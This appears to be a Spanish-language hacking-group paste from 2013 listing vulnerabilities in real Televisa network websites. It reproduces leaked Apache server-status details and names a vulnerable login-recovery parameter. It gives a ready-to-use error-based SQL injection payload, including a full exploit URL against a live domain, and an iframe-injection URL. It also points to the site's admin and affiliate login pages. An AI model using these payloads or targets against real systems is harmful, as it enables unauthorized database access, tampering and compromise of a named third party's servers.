Vulnerabilidades en TelevisaNetwork

1. Yei Zeta post 2013
2. addme:https://www.facebook.com/yei.zeta.5
3. Team_TheJokerHack
4.  
5.  
6. Server Version: Apache/2.2.21 (CentOS) DAV/2 PHP/4.4.9
7. Server Built: Nov 14 2011 19:44:22
8. Module Magic Number: 20051115:3
9. Hostname/port: www.televisa.com.ar:80
10. Timeouts: connection: 120 keep-alive: 120
11. MPM Name: ITK
12. MPM Information: Max Daemons: 256 Threaded: no Forked: yes
13. Server Architecture: 32-bit
14. Server Root: /etc/httpd
15. Config File: /etc/httpd/conf/httpd.conf
16. Server Built With:
17. -D APACHE_MPM_DIR="server/mpm/prefork"
18. -D APR_HAS_SENDFILE
19. -D APR_HAS_MMAP
20. -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
21. -D APR_USE_SYSVSEM_SERIALIZE
22. -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
23. -D APR_HAS_OTHER_CHILD
24. -D AP_HAVE_RELIABLE_PIPED_LOGS
25. -D HTTPD_ROOT="/etc/httpd"
26. -D SUEXEC_BIN="/usr/sbin/suexec"
27. -D DEFAULT_ERRORLOG="logs/error_log"
28. -D AP_TYPES_CONFIG_FILE="conf/mime.types"
29. -D SERVER_CONFIG_FILE="conf/httpd.conf"
30.  
31.  
32. SQLI PROBRABLE:
33.  
34. http://www.televisanetworks.tv/reccontrasenia.asp
35.  
36. Dependiendo de la base de datos back-end, la configuración de conexión de base de datos y el sistema operativo, un atacante puede montar uno o más de los siguientes tipos de ataques con éxito:
37.  
38. Lectura, actualización y borrado de datos arbitrarios de la base de datos
39. Ejecución de comandos en el sistema operativo subyacente
40. Lectura, actualización y eliminación de tablas de la base de datos arbitrarios
41.  
42. Detalles de su Explotacion:
43.  
44. http://cwe.mitre.org/data/definitions/89.html
45.  
46.  
47. Nombre de parametro:txtMail
48.  
49. Ataque permanente:
50.  
51. -1' or 1=1 (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)) '
52.  
53.  
54. http://www.televisanetworks.tv/noticiasListado.asp?=-1'%20or%201=1%20(select%201%20and%20row(1,1)%3E(select%20count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))%20'
55.  
56. IFRAME:
57.  
58. http://www.televisanetworks.tv/coberturaMapas.asp?idc=15&sMapa=%3Ciframe%20src=%22https://www.google.com%22%3E%3C/iframe%3E
59.  
60.  
61.  
62. Cookie:
63.  
64. http://www.televisanetworks.tv/afiliado_acceso.asp
65.  
66. http://www.televisanetworks.tv/admin/secure/logon.asp